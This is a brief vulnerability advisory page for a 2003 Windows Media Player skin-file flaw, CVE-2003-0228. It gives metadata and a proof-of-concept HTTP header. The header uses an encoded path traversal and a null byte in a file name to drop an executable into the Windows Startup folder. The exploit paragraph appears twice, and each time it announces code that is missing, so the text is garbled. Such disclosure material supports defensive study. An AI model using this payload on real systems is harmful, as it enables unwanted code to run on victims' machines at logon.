Microsoft Windows Media Player Skin File Code Execution Vulnerability
BID:7517
Info
Microsoft Windows Media Player Skin File Code Execution Vulnerability
| Bugtraq ID: | 7517 |
| Class: | Input Validation Error |
| CVE: |
CVE-2003-0228 |
| Remote: | Yes |
| Local: | No |
| Published: | May 07 2003 12:00AM |
| Updated: | Jul 11 2009 09:07PM |
| Credit: | Discovery of this vulnerability credited to Jouko Pynnonen of Oy Online Solutions Ltd, Finland and Jelmer. |
| Vulnerable: |
Microsoft Windows Media Player XP Microsoft Windows Media Player 7.1 |
| Not Vulnerable: |
Microsoft Windows Media Player 9.0 |
Exploit / POC
Microsoft Windows Media Player Skin File Code Execution Vulnerability
The following HTTP headers will cause a .exe file to be saved to the Windows Startup folder on Windows XP systems:
Content-Disposition: filename=%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cDocuments%20and%20Settings%5CAll%20Users%5CStart%20Menu%5CPrograms%5CStartup%5csomefile.exe%00.wmz
The following exploit code was provided by "jelmer" <[email protected]>:
The following HTTP headers will cause a .exe file to be saved to the Windows Startup folder on Windows XP systems:
Content-Disposition: filename=%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cDocuments%20and%20Settings%5CAll%20Users%5CStart%20Menu%5CPrograms%5CStartup%5csomefile.exe%00.wmz
The following exploit code was provided by "jelmer" <[email protected]>: